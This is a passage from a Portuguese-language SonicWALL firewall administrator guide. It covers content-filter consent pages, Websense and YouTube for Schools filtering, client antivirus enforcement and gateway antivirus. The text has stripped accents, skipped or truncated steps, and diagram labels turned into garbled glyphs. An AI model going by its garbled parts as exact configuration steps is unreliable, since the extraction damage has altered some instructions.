seleo. Insira o URL da pgina no campo Consentimento aceito (filtragem desativada).
usurios na rede.
URL de aceitao de consentimento (filtragem ativada) Quando um usurio aceita os
termos descritos na pgina Consentimento e escolhe o acesso Internet sem a proteo
da Filtragem de contedo, exibida uma pgina da web para confirmar sua seleo. Insira
o URL da pgina no campo Consentimento aceito (filtragem ativada). Esta pgina deve
ser encontrada em um servidor Web e estar acessvel como URI aos usurios na rede.

URL de pgina de redirecionamento de aceitao de consentimento (filtragem
desativada) - opcional: Se um URL inserido aqui, quando um usurio aceita os termos
na pgina Consentimento e escolhe o acesso no filtrado, redirecionado para este URL.
usurios na rede.
URL de pgina de redirecionamento de aceitao de consentimento (filtragem
ativada) - opcional: Se um URL inserido aqui, quando um usurio aceita os termos na
pgina Consentimento e escolhe o acesso filtrado, redirecionado para este URL. Esta
pgina deve ser encontrada em um servidor Web e estar acessvel como URI aos usurios
na rede.
Endereos IP filtrados obrigatrios

Quando um usurio abre o navegador da Web em um computador que requer filtragem de
contedo obrigatrio, a pgina de consentimento exibida. Voc deve criar a pgina da Web
que aparece quando o navegador da Web aberto. Ela pode conter o texto de uma Poltica de
Uso Aceitvel e a notificao de que violaes so registradas ou bloqueadas.
Esta pgina da Web deve ser encontrada em um servidor Web e estar acessvel como URL
aos usurios na LAN. Esta pgina tambm deve conter um link para uma pgina contida no
firewall que informa ao dispositivo que o usurio concorda em ter a filtragem habilitada. O link
deve ser <192.168.168.168/iAcceptFilter.html>, onde o endereo IP da LAN SonicWALL
usado em vez de 192.168.168.168.
Insira o URL da pgina no campo Consentimento de URL da pgina (filtragem obrigatria)
e clique em OK. Depois que o firewall for atualizado, exibida uma mensagem confirmando a
atualizao na parte inferior da janela do navegador da Web.
Adicionar um novo endereo

O firewall pode ser configurado para aplicar a filtragem de contedo para determinados
computadores na LAN. Clique em Adicionar para exibir a janela Adicionar entrada de
endereo IP filtrado. Insira os endereos IP desses computadores no campo Adicionar novo
endereo e, em seguida, clique no boto Enviar. At 128 endereos IP podem ser inseridos.
Para remover um computador da lista de computadores a serem filtrados, destaque o endereo
IP na lista Endereos IP filtrados obrigatrios e clique em Excluir.

Configurando a filtragem de contedo Websense Enterprise
Websense Enterprise um pacote de filtragem de Internet terceiro que permite que voc use
a filtragem de contedo da Internet atravs do SonicWALL.
Etapa 1 Selecione Websense Enterprise na lista Tipo de filtro de contedo.

Etapa 2 Clique em Configurar para exibir a janela Propriedades do Websense.
Nota Voc especifica a imposio de filtragem de contedo na Rede > Zonas pgina.
Propriedades de Websense
A pgina Geral na janela Propriedades do Websense inclui as seguintes configuraes.
Depois de configurar a filtragem de contedo do Websense na janela Propriedades do
Websense, clique em OK.
Status do servidor Websense

Essa seo exibe o status do servidor Websense Enterprise usado para filtragem de contedo.
Configuraes
Nome ou endereo IP do servidor primrio Insira o Nome do host do servidor ou o
endereo IP do servidor Websense Enterprise usado para a Lista de filtro de contedo.
Porta do servidor - Digite o nmero de porta UDP para o SonicWALL para "ouvir" o trfego
do Websense Enterprise. O nmero da porta padro 15868.

Nome do usurio - Para habilitar o relatrio de usurios e grupos definidos no servidor
Websense Enterprise, deixe este campo em branco. Para ativar a gerao de relatrios por
um usurio especfico ou grupo por trs do SonicWALL, digite o Nome do usurio
configurado no Servidor Websense Enterprise para o usurio ou grupo. Se estiver usando
diretrios baseado em NT no Servidor Websense Enterprise, o Nome do usurio est
nesse formato, por exemplo: NTLM:\\domainname\username. Se estiver usando diretrios
baseado em LDAP no Servidor Websense Enterprise, o Nome do usurio est nesse
formato, por exemplo: LDAP://o-domain/ou=sales/username.
Aviso Alerta! Se voc no tiver certeza sobre como inserir um nome de usurio nesta seo, deixe
o campo em branco e consulte a documentao do seu Websense para obter mais
informaes.
Se o servidor ficar indisponvel por (segundos) - Define que ao tomada se o

servidor do Websense Enterprise ficar indisponvel. O valor padro para o tempo limite do
servidor de 5 segundos, mas voc pode inserir um valor entre 1 e 10 segundos.
Bloquear o trfego para todos os sites da Web - Selecione essa opo para
bloquear o trfego a todos os sites da Web, exceto os Domnios permitidos, at que o
servidor Websense Enterprise esteja disponvel.
Permitir o trfego para todos os sites da Web - Selecione essa opo para permitir
o trfego a todos os sites da Web sem filtragem de servidor Websense Enterprise. No
entanto, Domnios proibidos e Palavras-chave, se ativados, ainda sero bloqueados.
Cache de URL
Tamanho de cache (KB) - Configura o tamanho do Cache de URL em KB.
Dica Dica! Um tamanho de cache de URL maior pode resultar em melhorias perceptveis na
navegao na Internet em tempos de resposta.
YouTube for School no suporte de filtragem de contedo

YouTube for Schools um servio que permite acesso personalizado ao YouTube para os
alunos, professores e administradores. YouTube Education (YouTube EDU) fornece acesso de
escolas a centenas de milhares de vdeos educacionais livres. Esses vdeos so provenientes
de um nmero de organizaes respeitadas. Voc pode personalizar o contedo disponvel na
seu escola. Todas as escolas obtm acesso a todo o contedo do YouTube EDU, mas os
professores e administradores tambm podem criar listas de reproduo de vdeos que podem
ser exibidas somente na rede da sua escola.
Nota Antes de configurar o seu dispositivo de segurana SonicWALL para YouTube for Schools,
voc deve primeiro se inscrever: www.youtube.com/schools
A configurao do YouTube for Schools depende do mtodo de Filtragem de contedo que

voc estiver usando, que definido na pgina Servios de segurana > Filtro de contedo.

Os usurios que so membros de vrios grupos, onde uma poltica permite acesso irrestrito ao
YouTube e a outra poltica restringe o acesso ao YouTube for Schools, so filtrados pela
poltica do YouTube for Schools e no possuem acesso irrestrito ao YouTube.
Usurios no podem ser membros de vrios grupos que possuem IDs do YouTube for Schools
diferentes. Enquanto o firewall aceitar a configurao, isso no suportado.
Nota Para mais informaes sobre a configurao geral do CFS, consulte a seo Servios de
segurana > Filtro de contedo no Guia de Administrador do SonicOS.
Ao selecionar Via controle de aplicativos no menu Atribuio de poltica de CFS, na pgina

Servios de segurana > Filtro de contedo, o Filtro de contedo do YouTube for Schools
estar configurado como uma poltica de Controle de aplicativos.
A filtragem de contedo do YouTube for Schools est configurada em duas partes:
Configurando um objeto de correspondncia
Configurando uma regra de aplicativo
Primeiro, voc cria um objeto de correspondncia ou vrios objetos de correspondncia. Em
seguida, voc aplica-as na Regra do aplicativo.
Nota Todas as conexes do navegador no so afetadas at que a poltica da Regra de aplicativo

seja aplicada e o navegador seja fechado e reaberto.
Nota Se voc tiver um navegador aberto como administrador no firewall, voc ser excludo a
imposio de poltica do CFS, a menos que voc configure o firewall especificamente para
no excluir o administrador.
Configurando o firewall para no excluir o administrador

Para configurar o firewall para no excluir o administrador:
Etapa 1 V para a pgina Servios de segurana > Filtro de contedo.

Etapa 2 No cabealho Lista de excluso CFS selecione a opo No ignorar bloqueio de CFS para
o administrador.
Etapa 3 Clique no boto Aceitar na parte de cima da pgina.

Configurando um objeto de correspondncia para filtragem de contedo do
YouTube for School
Para configurar um objeto de correspondncia para filtragem de contedo do YouTube for
School:
Etapa 1 Navegue at Firewall > Objetos de correspondncia.
Etapa 2 Clique em Adicionar novo objeto de correspondncia.

Etapa 3 Na caixa Nome do objeto, digite um nome descritivo.
Etapa 4 No menu Tipo de objeto de correspondncia, selecione Lista proibida/permitida de CFS.
Etapa 5 No menu Tipo de correspondncia, selecione Correspondncia parcial.
Etapa 6 Para Representao de entrada, selecione a opo Alfanumrica.
Etapa 7 Na caixa Contedo, digite youtube.com.
Etapa 9 Na caixa Contedo, digite ytimg.com.
Etapa 11 Clique em OK para criar o Objeto de correspondncia.
Nota Voc pode repetir essas etapas para criar vrios objetos de correspondncia.

Configurando uma Regra de aplicativo para filtragem de contedo do YouTube for
School
Para configurar uma Regra de aplicativo para filtragem de contedo do YouTube for School:

Etapa 2 Clique em Adicionar nova poltica.
A caixa de dilogo Configuraes da poltica de controle de aplicativos aparece.
Etapa 3 Na caixa Nome da poltica, digite um nome descritivo para esta poltica, como CFS YouTube.
Etapa 4 No menu Tipo de poltica, selecione CFS.
Etapa 5 Do menu Endereo, selecione o grupo de endereo ao qual essa regra se aplica.
Etapa 6 Do menu Endereo de excluso, selecione o grupo de endereo ao qual essa regra se exclui.
Objetos excludos no so afetados pela poltica.
Etapa 7 Do menu Objeto de correspondncia, selecione o objeto que voc deseja correspondncia.
Etapa 8 Do menu Objeto de ao, selecione a ao que voc deseja que essa poltica execute.
Nesse caso, escolhemos Pgina de bloqueio CFS.
Etapa 9 Do menu Usurios/grupos includos, selecione o usurio ou grupo de usurios ao qual essa
regra se aplica.

Etapa 10 Do menu Usurios/grupos includos, selecione o usurio ou grupo de usurios ao qual essa
regra se exclui. Objetos excludos no so afetados pela poltica.
Etapa 11 No menu Cronograma, selecione o cronograma desejado. Sempre ativo o padro.
Etapa 12 Se voc deseja usar relatrios de fluxo, selecione a opo Habilitar relatrios de fluxo.
Etapa 13 Se voc deseja usar registros em log, selecione a opo Habilitar registro em log.
Etapa 14 Se voc quiser usar o formato CFS para as mensagens de log, selecione a opo Registrar
usando formato de mensagem CFS.
Etapa 15 Se voc deseja filtrar mensagens de log redundantes, insira o nmero de segundos para o
intervalo de filtro na caixa Filtro de redundncia de log (segundos). Para usar as
configuraes globais de mensagens de registro de filtragem, selecione a opo Usar
configuraes globais (na mesma linha).
Etapa 16 Do menu Zona, selecione a zona a qual essa poltica se aplica.
Nota Para as opes Lista de permitidos/excludos do CFS e o Lista de proibidos/includos

do CFS, voc deve selecionar o objeto de correspondncia criado no Configurando um
objeto de correspondncia para filtragem de contedo do YouTube for School na
pgina 1192. (Nosso exemplo usa CFS permitido YT4S.) Este objeto de correspondncia
deve ser selecionado para incluir ou excluir.
Etapa 17 Do menu Lista de permitidos/excludos do CFS, selecione o objeto que voc no deseja
bloquear com esta poltica.
Etapa 18 Do menu Lista de proibidos/includos do CFS, selecione o objeto que voc deseja bloquear
com esta poltica.
Etapa 19 Se voc deseja usar Imposio de pesquisa segura, selecione a opo Habilita a imposio
de pesquisa segura.
Etapa 20 Para ativar o YouTube for Schools, selecione a caixa de seleo Habilitar YouTube for
Schools.
Etapa 21 Na caixa ID da escola, digite o nmero da ID da escola, obtido em www.youtube.com/ escolas
Etapa 22 Clique em OK para criar a poltica.
Nota Todas as conexes do navegador no so afetadas at que a poltica da Regra de aplicativo

seja aplicada e o navegador seja fechado e reaberto.
Nota Se voc tiver um navegador aberto como administrador no firewall, voc ser excludo a
imposio de poltica do CFS, a menos que voc configure o firewall especificamente para
no excluir o administrador. Consulte Configurando o firewall para no excluir o
administrador na pgina 1191.

Configurando o YouTube for Schools em uma poltica de Filtro de contedo
Quando o menu suspenso Atribuio de poltica de CFS definido como Via telas de
usurio e de zona, o YouTube for Schools configurado como parte da poltica de Filtro de
contedo.
Na pgina Servios de segurana > Filtro de contedo, selecione Servios de filtro de
contedo no menu suspenso Tipo de filtro de contedo.

Etapa 2 Na guia Poltica, clique no cone Configurar para a poltica CFS que deseja ativar no YouTube
for Schools.
Etapa 3 Clique na guia Configuraes e selecione a caixa de seleo Habilitar YouTube for Schools.
Etapa 4 Cole a sua ID de escola, obtida em www.youtube.com/schools.

Etapa 6 Na guia Lista personalizada, clique no boto Adicionar para Domnios permitidos.
Etapa 7 Na caixa de dilogo, digite "youtube.com" no campo Nome de domnio e clique em OK.
Etapa 8 Clique em Adicionar novamente.

Etapa 9 Digite ytimg.com" no campo Nome de domnio e clique em OK.

Essas configuraes iro substituir qualquer categoria CFS que bloqueia o YouTube.
Quando a poltica for aplicada, qualquer conexes de navegador existentes no sero
afetadas at que o navegador seja fechado e reaberto. Alm disso, se voc tiver um navegador
aberto como administrador no firewall, voc ser excludo a imposio de poltica do CFS, a
menos que voc configure o firewall especificamente para no excluir voc (selecione a caixa
de seleo No ignorar bloqueio de CFS para o administrador na pgina Servios de
segurana > Filtro de contedo).
YouTube for Schools e HTTP

A implementao do SonicWALL CFS do YouTube for Schools no oferece suporte a acesso
HTTPS ao youtube.com. Quando o youtube.com acessado por HTTPS, o usurio precisar
de acesso irrestrito ao contedo do YouTube. As seguintes solues podem ser
implementadas para solucionar o problema:
Habilitar o DPI-SSL do cliente com inspeo de CFS. A ativao do recurso DPI-SSL
requer licena separada e isso suportado em modelos NSA 240 e superiores.
Criar uma LAN (ou DMZ) para Regra de acesso WAN como em:
Ao: Negar
Servio: HTTPS
Origem: Qualquer
Destino: Criar de um Objeto de endereo de FQDN para youtube.com e ytimg.com
Problemas
O DPI-SSL no pode ser usado para bloquear https://youtube.com, mas somente permiti-lo.
Portanto, a seo DPI acima no deve ser parte das solues que podem ser implementadas
para solucionar o problema.
Ao criar a regra acima para bloquear o acesso https a youtube.com ou www.youtube.com e
s.ytimg.com, descobrimos que https://www.google.com agora tambm est bloqueado, bem
como https://drive.google.com e https://play.google.com/.
Outros sites do Google, como Gmail e calendar.google.com, funcionam sem problemas.

Criar FQDNS para o site bloqueado e criar uma regra de permisso para o grupo tambm
permite o acesso ao youtube por https.
Em suma, criar regras de negao para https>youtube fqdns tambm bloqueia outros sites de
ssl do google. Portanto, no encontramos forma possvel de usar o youtube nas escolas e
bloquear o acesso a ssl youtube sem bloquear outros sites de ssl do google. E no h nenhuma
maneira de permitir outros sites sem deixar de permitir o youtube ssl.

Captulo 64
Ativando o SonicWALL Client Anti-Virus
Servios de segurana > Antivrus

Por sua natureza, os produtos antivrus normalmente exigem manuteno regular e ativa em
cada computador. Quando um novo vrus detectado, todos os softwares antivrus
implantados dentro de uma organizao devem ser atualizados com os arquivos de definio
de vrus mais recentes. Falha ao fazer isso gravemente limita a eficcia do software antivrus
e interrompe o tempo de trabalho produtivo. Com mais de 50.000 vrus conhecidos e novas
epidemias de vrus que ocorrem regularmente, a tarefa de manter e atualizar a proteo contra
vrus pode se tornar incmoda. Infelizmente, muitas empresas de pequeno a mdio porte no
tm equipe de TI adequada para manter seu software antivrus. As lacunas resultantes nas
defesas de vrus podem levar perda de dados e diminuir a produtividade dos funcionrios.
As epidemias de vrus amplamente difundidas, como o NIMDA e o Code Red, ilustram a
natureza problemtica da defesa de vrus para pequenas e mdias empresas. Os usurios sem
os arquivos mais recentes de definio de vrus permitem que esses vrus se multipliquem e
infectem muitos outros usurios e redes. O SonicWALL Client Anti-Virus impede ocorrncias
como essas e oferece uma nova abordagem para a proteo contra vrus. O SonicOS monitora
constantemente a verso do arquivo de definio de vrus e automaticamente dispara o
download e a instalao de novos arquivos de definio de vrus para o computador de cada
usurio. Alm disso, o firewall restringe o acesso do cada usurio Internet at que eles
estejam protegidos, portanto, age como um mecanismo reforador da diretiva de proteo de
vrus da empresa. Essa nova abordagem garante que a verso mais atual do arquivo de
definio de vrus esteja instalada e ativa em cada computador na rede, impedindo um invasor
usurio de desabilitar a proteo contra vrus e potencialmente expor toda a organizao a
uma epidemia.
Nota Voc deve adquirir uma assinatura de antivrus para impor o antivrus atravs da interface
de gerenciamento do firewall.
Ativando o cliente antivrus do SonicWALL

Se o Sonic WALL Client Anti-Virus no estiver ativado, voc deve ativ-lo.
Ativando o SonicWALL Client Anti-Virus | 1199

Se voc no tiver uma Chave de ativao, deve adquirir o SonicWALL Client Anti-Virus em um
revendedor SonicWALL ou na sua conta mysonicwall.com (limitado a clientes dos EUA e
Canad).
Nota Para obter a documentao completa do SonicWALL Client Anti-Virus, consulte o Guia do
Administrador do SonicWALL Client Anti-Virus, disponvel em http://www.sonicwall.com/us/
Support.html
Se voc tem uma Chave de ativao para a sua assinatura do SonicWALL Client Anti-Virus,
siga estas etapas para ativar o SonicWALL Client Anti-Virus:
Nota Voc deve ter uma conta mysonicwall.com e seu SonicWALL deve ser registrado para ativar
o SonicWALL Client Anti-Virus.
Etapa 1 Clique no link Assinatura do SonicWALL Client Anti-Virus na pgina Servios de

segurana > Antivrus. A pgina Login no mysonicwall.com ser exibida.
conectado sua conta mysonicwall.com, a pgina Sistema > Licenas exibida aps voc
clicar no link Assinatura do SonicWALL Client Anti-Virus.
line. Digite a Chave de ativao no campo Nova chave de licena e clique em Enviar. Sua
assinatura do SonicWALL Client Anti-Virus ativada no seu firewall.
Etapa 4 Se voc ativou o SonicWALL Client Anti-Virus em mysonicwall.com, a ativao do SonicWALL
Client Anti-Virus ativada automaticamente no seu SonicWALL dentro de 24 horas ou voc
pode clicar no boto Sincronizar na pgina Servios de segurana > Resumo para atualizar
seu firewall.
Ativando uma AVALIAO GRATUITA do SonicWALL Client Anti-

Virus
Voc pode experimentar uma verso de AVALIAO GRATUITA do SonicWALL Client Anti-
Virus ao seguir essas etapas:
Etapa 1 Clique no link AVALIAO GRATUITA. A pgina Login no mysonicwall.com ser exibida.
conectado sua conta mysonicwall.com, a pgina Sistema > Licenas aparece aps clicar no
link AVALIAO GRATUITA.
Etapa 3 Clique em AVALIAO GRATUITA na coluna Gerenciar servio na tabela Gerenciar
servios on-line. Sua assinatura do SonicWALL Client Anti-Virus ativada no seu firewall.
Etapa 4 Selecione Servios de segurana > Antivrus para exibir a pgina do Antivrus para
configurao do seu SonicWALL Client Anti-Virus.

Configurando o servio do Client Anti-Virus
Polticas do Client Anti-Virus

Os seguintes recursos esto disponveis na seo de Polticas antivrus:
Desabilitar poltica de Confivel para Pblica - No marcada, essa opo impe as
polticas do antivrus em computadores localizados em reas confiveis. Escolher esta
opo permite que computadores de uma zona confivel (com uma LAN) acessem
computadores em zonas pblicas (como a DMZ), mesmo se o software de antivrus no
estiver instalado nos computadores da LAN.
Dias antes de forar atualizao - Este recurso define o mximo nmero de dias de
acesso Internet antes de o SonicWALL solicitar o download dos arquivos de data de vrus
mais recentes.
Forar atualizao ao alertar - O SonicWALL, Inc. transmite alertas de vrus para todos
os dispositivos SonicWALL com uma assinatura do antivrus. Trs nveis de alertas esto
disponveis, e voc pode selecionar mais de um. Quando um alerta recebido com esta
opo selecionada, os usurios so atualizados para a verso mais recente do VirusScan
ASaP antes que eles possam acessar a Internet. Essa opo substitui a seleo Nmero
mximo de dias permitido antes de forar a atualizao. Alm disso, todo alerta de vrus
registrado e um alerta enviado ao administrador.
Baixo risco - Um vrus que no reportado no campo e que considerado como
improvvel de ser localizado no campo no futuro, representa um risco baixo. Mesmo
que um vrus inclua uma carga de danos imprevistos e muito graves, seu risco ser
baixo na mesma.
Risco mdio - Se um vrus for encontrado no campo e usar um mecanismo de
infeces menos comum, considerado como risco mdio. Se sua prevalncia
permanecer baixa e sua carga no for grave, o seu risco pode descer para um nvel
mais baixo. Da mesma forma, seu nvel de risco pode ser atualizado para alto se o
vrus se tornar mais e mais difundido.
Risco alto - Para receber a classificao de risco alto, necessrio que o vrus seja
reportado frequentemente no campo. Alm disso, a carga deve ser capaz de causar,
pelo menos, alguns danos graves. Se causar danos muito graves e imprevistos, pode
ser classificado como risco alto mesmo com um baixo nvel de prevalncia.
Imposio de antivrus
Atualmente, o SonicWALL Client Anti-Virus oferece suporte s plataformas Windows 95, 98,
NT, XP e 2000. Para acessar a Internet, os computadores com outros sistemas operacionais
devem ser isentos das polticas antivrus. Para garantir a proteo de rede completa contra
ataques de vrus, recomendvel que apenas servidores e mquinas sem suporte sejam
excludas da proteo e que o software antivrus de terceiros seja instalado em cada mquina
antes de excluir a mquina da imposio de antivrus. Existem trs opes para definir os
computadores isentos:
Impor polticas do Client Anti-Virus para todos os computadores - Selecionar esta
opo impe que o computador instale o VirusScan ASaP para acessar a Internet ou o
DMZ. Esta a configurao padro.
Incluir o intervalo de endereos especificado na imposio Anti-Virus - Escolher essa
opo permite que o administrador defina intervalos de endereo IP para receber a
imposio de antivrus. Se voc selecionar essa opo, especifique um intervalo de
endereo IP a ser imposto. Qualquer computador que obrigue a imposio precisa de um
Ativando o SonicWALL Client Anti-Virus | 1201

endereo IP esttico na faixa de endereos IP especificada. At 64 intervalos de endereo
IP podem ser inseridos para imposio. Clique em Adicionar para exibir a janela
Adicionar entrada de intervalo AV e insira o intervalo de endereo IP.
Excluir o intervalo de endereos especificado na imposio Anti-Virus - Selecionar
essa opo permite que o administrador defina intervalos de endereo IP isentos da
imposio de antivrus. Se voc selecionar essa opo, especifique o intervalo de
endereo IP para iseno. Qualquer computador que obrigue o acesso Internet irrestrito
precisa de um endereo IP esttico na faixa de endereos IP especificada. At 64
intervalos de endereo IP podem ser inseridos. Clique em Adicionar para exibir a janela
Adicionar entrada de intervalo AV e insira o intervalo de endereo IP.

Captulo 65
Configurao de Imposio do CF do
cliente
Servios de segurana > Imposio do CF do cliente

A Imposio do CF do cliente da Dell SonicWALL fornece imposio de poltica de proteo e
produtividade para empresas, escolas, bibliotecas e agncias do governo. A Dell SonicWALL
criou uma revolucionria arquitetura de filtragem de contedo, utilizando um banco de dados
escalvel e dinmico para bloquear contedo da Web censurvel e improdutivo.
A Imposio do CF do cliente oferece a combinao ideal de controle e flexibilidade para
garantir os mais altos nveis de proteo e produtividade. A Imposio do CF do cliente impede
que usurios individuais acessem contedo inadequado, reduzindo a responsabilidade
organizacional e aumentando a produtividade. Os sites so classificados de acordo com o tipo
de contedo que eles contm. O Content Filtering Service (CFS) bloqueia ou permite o acesso
a esses sites com base em suas avaliaes e nas configuraes de poltica de um usurio ou
grupo.
As empresas geralmente podem controlar o comportamento de navegao na web e o
contedo quando a navegao iniciada dentro do permetro do dispositivo de segurana,
definindo polticas de filtro no dispositivo. Mas, quando o mesmo dispositivo sai do permetro,
o controle perdido. A Imposio do CF do cliente entra em ao para resolver esta lacuna,
bloqueando o contedo da Web censurvel e improdutivo fora do permetro de segurana do
dispositivo.
Os dispositivos de segurana da Dell SonicWALL que trabalham em conjunto com a Imposio
do CF do cliente garantem, de forma automtica e consistente, que todos os pontos terminais
tenham as atualizaes de software mais recentes para excelente proteo da rede. O cliente
projetado para funcionar com Windows e Mac PCs.
A Client CF Enforcement consiste nos trs seguintes componentes principais:
Um dispositivo de segurana de rede que executa SonicOS cuja funo facilitar e
verificar licenas de CFS e habilitar ou desabilitar imposio e definir excluso e outras
configuraes.
Acionamento automtico para instalar a Client CF Enforcement de qualquer cliente que
tenta acessar a Internet sem o software do cliente instalado ter o acesso a sites
bloqueado at ser instalado.
Administrao de polticas do cliente e grupos de cliente usando o servidor EPRS baseado
na nuvem acessado a partir do MySonicWALL ou do SonicOS executado no dispositivo.
Configurao de Imposio do CF do cliente | 1203

Habilitao e configurao da Client CF Enforcement
Esta seo descreve como habilitar e definir as configuraes da Imposio do CF do cliente
no SonicOS.
A Client CF Enforcement deve ser habilitada no dispositivo Dell SonicWALL antes que os
usurios sejam apresentados a uma pgina de bloqueio da Web, que solicita ao usurio a
instalao da Client CF Enforcement.
Nota Se o Content Filtering Service (CFS) no estiver ativado em MySonicWALL, voc dever
ativ-lo para impor as polticas de filtragem de contedo do cliente nos sistemas do cliente.
Configurao da Client CF Enforcement nos servios de segurana

Para definir as configuraes da Client CF Enforcement, execute as seguintes etapas em seu
dispositivo Dell SonicWALL:
Etapa 1 Efetue login em seu dispositivo de segurana Dell SonicWALL.

Etapa 2 Navegue at a pgina Servios de segurana > Imposio do CFS do cliente.

Etapa 3 Na seo Polticas de Imposio do CF do cliente, selecione o nmero de dias na lista
suspensa para o Perodo de cortesia durante o qual as polticas de imposio do CFS
permanecem vlidas.
A seo Listas de imposio do CF do cliente contm uma tabela que inclui a Lista de
imposio do CFS do cliente e Excludo da lista de imposio do CF do cliente.
Para configurar essas tabelas, clique no cone Configurar da lista que deseja configurar. A
janela Editar grupo de objetos de endereo exibida. Selecione na lista disponvel os valores
a incluir/no incluir para o grupo.
Etapa 4 Para a Lista de imposio do CF do cliente e Excludo da lista de imposio do CF do

cliente. Se voc criou alguma entrada nessas listas, poder clicar na seta ao lado do ttulo da
lista para exibir as entradas. Para adicionar entradas lista, clique no cone Configurar nessa
linha.
Etapa 5 Para o campo intitulado Para computadores cujos endereos no esto includos em
nenhuma das listas acima, a imposio padro , selecione Imposio do CF do cliente
na lista suspensa. Ele est localizado abaixo da seo Listas de imposio do CF do cliente.
Selecionar isso solicitar todos os outros computadores conectados Internet pelo dispositivo
que instalem o Enforced Client. Voc pode selecionar Nenhum na lista suspensa se quiser
impor apenas o servio nos computadores que voc configurou.

Habilitao do CFS do cliente em zonas da rede
A Filtragem de contedo do cliente imposta por zona executando as seguintes etapas:
Etapa 1 Na pgina Servios de segurana > Imposio do CF do cliente, clique no link Rede>
Zonas na Nota.
A pgina Rede > Zonas exibida.
Etapa 2 Clique no boto Configurar para a zona qual voc deseja impor o Servio de filtragem de
contedo do cliente.

A caixa de dilogo Adicionar zona exibida.
Etapa 3 Marque a caixa de seleo Impor servio de filtragem de contedo.

Etapa 4 Marque a caixa de seleo Habilitar servio de CF de cliente.

Captulo 66
Gerenciamento de Gateway do SonicWALL
Servio de antivrus
Servios de segurana > Antivrus do Gateway

O SonicWALL GAV oferece proteo antivrus em tempo real diretamente no firewall usando o
mecanismo de Inspeo de Pacote Detalhada de IPS v 2.0 da SonicWALL para inspecionar
todo o trfego que atravessa o gateway do SonicWALL. Com base na arquitetura sem
reagrupamento da SonicWALL, o SonicWALL GAV inspeciona vrios protocolos de aplicativo,
bem como fluxos genricos de TCP e trfego compactado. Como o SonicWALL GAV no
precisa executar reagrupamento, no h limitaes de tamanho de arquivo impostas pelo
mecanismo de varredura. Decodificao Base64 e descompactao ZIP, LHZ e GZIP (LZ77)
tambm so executadas em uma base por pacote de passagem nica.
O SonicWALL GAV oferece proteo contra ameaa diretamente no firewall por
correspondncia de arquivos baixados ou enviados por e-mail contra um banco de dados
abrangente e atualizado dinamicamente de assinaturas de vrus. Ataques de vrus so
detectados e eliminados antes que eles trafeguem nas reas de trabalho. Novas assinaturas
so criadas e adicionados ao banco de dados por uma combinao da Equipe SonicAlert da
SonicWALL, analistas de vrus terceiros, desenvolvedores de cdigo aberto e outras fontes.
O SonicWALL GAV pode ser configurado para proteger contra ameaas internas, bem como
aquelas originadas de fora da rede. Ele funciona em uma variedade de protocolos, incluindo
SMTP, POP3, IMAP, HTTP, FTP, NetBIOS, mensagens instantneas e aplicativos ponto-a-
ponto e dezenas de outros protocolos com base em fluxo para fornecer aos administradores
controle e preveno de ameaas abrangente na rede. Por os arquivos com vrus e cdigos
mal-intencionados tambm poder ser compactado e, portanto, inacessveis para solues de
antivrus convencionais, o SonicWALL GAV integra a tecnologia avanada de descompactao
que descompacta automaticamente e faz a varredura de arquivos em uma base por pacote.
Gerenciamento de Gateway do SonicWALL Servio de antivrus | 1209

Abordagem em vrias camadas do SonicWALL GAV
O SonicWALL GAV oferece proteo antivrus abrangente e em vrias camadas para redes na
rea de trabalho, para a rede e em sites remotos. O SonicWALL GAV fiscaliza as polticas de
antivrus no gateway para garantir que todos os usurios tenham os mais recentes arquivos de
atualizaes e monitora quando eles entram na rede.
2EMOTE3ITE'ATEWAY
%NFORCED0ROTECTION
)NTERNAL.ETWORK0ROTECTION
&ILE$OWNLOAD0ROTECTION
$ESKTOPAND3ERVER0ROTECTION
Proteo de locais remotos
Etapa 1 Os usurios enviam e-mails e arquivos tpicos entre locais remotos e o escritrio corporativo.
Etapa 2 O SonicWALL GAV verifica e analisa os arquivos e as mensagens de e-mail no firewall.
Etapa 3 Os vrus so encontrados e bloqueados antes de infectar a rea de trabalho remota.
Etapa 4 O vrus registrado e a alerta enviada ao administrador.
Central Site
Sunnyvale, CA
Internet
wlan pc card lan wan opt 1 2 3 4 5 6

security signal link/spd
on/act link/act activity NSA 240
Network Security Appliance E7500 Network Security Appliance E7500
wlan pc card lan wan opt 1 2 3 4 5 6 wlan pc card lan wan opt 1 2 3 4 5 6
security signal link/spd security signal link/spd
on/act link/act activity NSA 240 on/act link/act activity NSA 240
Remote Site Remote Site Remote Site Remote Site Remote

R t Site
Sit
London, UK San Jose, CA Cairo, Egypt Houston, TX Boston, MA

Proteo de rede interna
Etapa 1 O usurio interno contrai um vrus e o libera internamente.

Etapa 2 Todos os arquivos so verificados no gateway antes que sejam recebidos por outros usurios
da rede.
Etapa 3 Se o vrus for encontrado, o arquivo ser descartado.
Virus Discarded
Alert Logged
Marketing Zone Engineering Zone Visitor Zone Sales Zone S

Server Z
Zone
Downloads de arquivo HTTP

Etapa 1 O cliente faz uma solicitao para baixar um arquivo da Web.
Etapa 2 O arquivo baixado atravs da Internet.
Etapa 3 O arquivo analisado no mecanismo SonicWALL GAV para vrus e cdigos mal-intencionados.
Etapa 4 Se o vrus for encontrado, o arquivo descartado.
Infected FIle
HTTP Request
Web Server Virus Discarded
Alert Logged
LAN

Proteo para servidores
Etapa 1 O usurio externo envia um e-mail de entrada.

Etapa 2 O e-mail analisado no mecanismo SonicWALL GAV para vrus e cdigos mal-intencionados
antes de ser recebido pelo servidor de e-mail.
Etapa 3 Se o vrus for encontrado, a ameaa bloqueada.
Etapa 4 O e-mail devolvido ao remetente, o vrus registrado e a alerta enviada ao administrador.
Infected Email
Infected Client Virus Discarded

Alert Logged
LAN
Arquitetura do SonicWALL GAV

O SonicWALL GAV baseado em alto desempenho do mecanismo SonicWALL DPIv2.0
(Inspeo de Pacote Detalhada verso 2.0), que executa a varredura de todos diretamente no
firewall. O SonicWALL GAV inclui a tecnologia de descompactao avanada que pode
descompactar automaticamente e varrer os arquivos em uma base por pacote para procurar
por vrus e malwares. O mecanismo SonicWALL GAV pode realizar decodificao base64 sem
nunca remontar a transmisso de e-mails codificada em base64 toda. Como o SonicWALL GAV
no precisa executar reagrupamento, no h limitaes de tamanho de arquivo impostas pelo
mecanismo de varredura. A decodificao Base64 e descompactao ZIP, LHZ e GZIP (LZ77)
tambm so executadas em uma base por pacote de passagem nica. A funcionalidade de

varredura de vrus gratuita de remontagem do mecanismo SonicWALL GAV herdada do
mecanismo de Inspeo de Pacotes Detalhada, que capaz de examinar fluxos sem nunca
efetuar buffer em qualquer um dos bytes no fluxo.
0ACKET0ATH
3TART3TAGE 0ROTOCOL3TATE %MAIL&ORMAT $ECOMPRESSION 3CANNING 0REVENTION

-ACHINE $ECODING
!CTIONS
